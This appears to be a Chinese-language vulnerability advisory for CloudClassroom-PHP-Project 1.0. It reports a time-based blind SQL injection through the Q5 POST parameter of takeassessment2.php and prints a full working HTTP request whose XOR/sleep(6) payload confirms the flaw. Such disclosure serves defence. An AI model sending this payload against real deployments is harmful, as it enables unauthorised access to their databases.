在CloudClassroom-PHP-Project 1.0的takeassessment2.php端点中存在SQL注入漏洞,Q5 POST参数未经清理直接嵌入SQL语句中。
漏洞类型 :
SQL注入
产品供应商 :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
受影响产品代码库 :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
受影响组件 :
takeassessment2.php, Q5 POST参数, SQL查询逻辑
攻击向量 :
攻击者向 /CloudClassroom-PHP-Project-master/takeassessment2.php 发送恶意POST请求,在Q5参数中注入负载,导致SQL处理出现时间延迟(基于时间的盲SQL注入)。
POST请求:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= 该请求导致响应延迟6秒,确认漏洞存在。
参考 :
https://owasp.org/www-community/attacks/SQL_Injection
发现者 : saurabh solanki